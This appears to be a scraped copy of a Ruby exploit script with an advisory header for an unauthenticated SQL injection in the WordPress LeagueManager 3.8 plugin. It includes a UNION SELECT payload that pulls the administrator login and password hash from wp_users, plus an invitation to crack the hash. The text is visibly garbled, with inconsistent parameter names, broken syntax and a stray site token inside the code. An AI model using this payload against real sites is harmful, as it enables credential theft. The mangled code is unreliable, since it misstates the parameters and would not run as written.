#! /Usr/bin/ruby # title: WordPress LeagueManager Plugin v3.8 SQL Injection # keywords: inurl: "/wp-content/plugins/leaguemanager/" # author r: joshua Renault # official Program Website: http://wordpress.org/extend/plugins/leaguemanager/ #: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip # Affected versions: 3.8 # testing platform: BT5R1-Ubuntu 10.04.2 LTS # CVE: CVE-2013-1852 # others # OVERVIEW: # An SQL Injection vulnerability exists in the league_id parameter of a function call made # by the leaguemanager_export page. this request is processed within the leaguemanager. php: ## if (isset ($ _ POST ['leaguemanager _ export']) # $ lmLoa Der-> adminPanel-> export ($ _ POST ['situations _ id'], $ _ POST ['Mode']); # Which does not sanitize of SQL injection, and is passed to the admin/admin. php page # into the export ($ league_id, $ mode) function which also does not sanitize for SQL injection # when making this call: $ this-> league = $ leaguemanager-> getLeague ($ league_id); # The information is then echoed to a CSV file that is then provided. # Since No authentication is required when making a POST request to this page, # I. e/wp-admin/admin. php? Page = leaguemanager-export the request can be made with no established # session. # solution: # A possible fix for this wocould be to cast the league_id to an integer during any # of the function CILS. the following changes can be made in the leaguemanager. php file: # $ lmLoader-> adminPanel-> export (int) $ _ POST ['rules _ id'], $ _ POST ['Mode']); # These functions shoshould also not be available to public requests, And thus session handling # shocould also be checked prior to the requests being processed within the admin section. # The responsible disclosure processes were distorted by the fact that the author no longer # supports his well established plugin, and there are currently no maintainers. after # e-mailing the folks over at plugins@wordpress.org they 've decided to discontinue the plugin # and not patc H the vulnerability. # The following ruby exploit will retrieve the administrator username and the salted # password hash from a given site with the plugin installed: # emerge # Exploit: require 'net/http 'require 'url' if ARGV. length = 2 post_params = {'left _ id' => '7 union select all user_login, 2, 3, 4, 5, 6, 7, 8 ,'\ '9, 10, 11, 12, 13, user_pass, 15, 16, 17,18, 19,20, 22, from wp_users -- ', 'Mode' => 'temams ', 'leaguemanager _ export' => 'Download + file'} target_url = ARGV [0] + ARGV [1] + "/wp-admin/admin. php? Page = leaguemanager-export "begin resp = Net: HTTP. post_form (URI. parse (target_url), post_params) rescue www.2cto.com puts "Invalid URL... "end if resp. nil? Print_error "No response received ed..." elsif resp. code! = "200" puts "Page doesn' t exist! "Else admin_login = resp. body. scan (/21 \ t (. *) \ t2. * 0 \ t (. *) \ t15/) if (admin_login.length> 0) puts "Username: # {admin_login [0] [0]}" puts "Hash: # {admin_login [0] [1]} "puts" \ nNow go crack that with Hashcat :) "else puts" Username and hash not supported ed. maybe it's patched? "End else puts" Usage: ruby LeagueManagerSQLI. rb \" http://example.com \ "\"/Wordpress \ "" end # Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. wu, friends & family. # contact: # Mail: infosec4breakfast@gmail.com # Blog: infosec4breakfast.com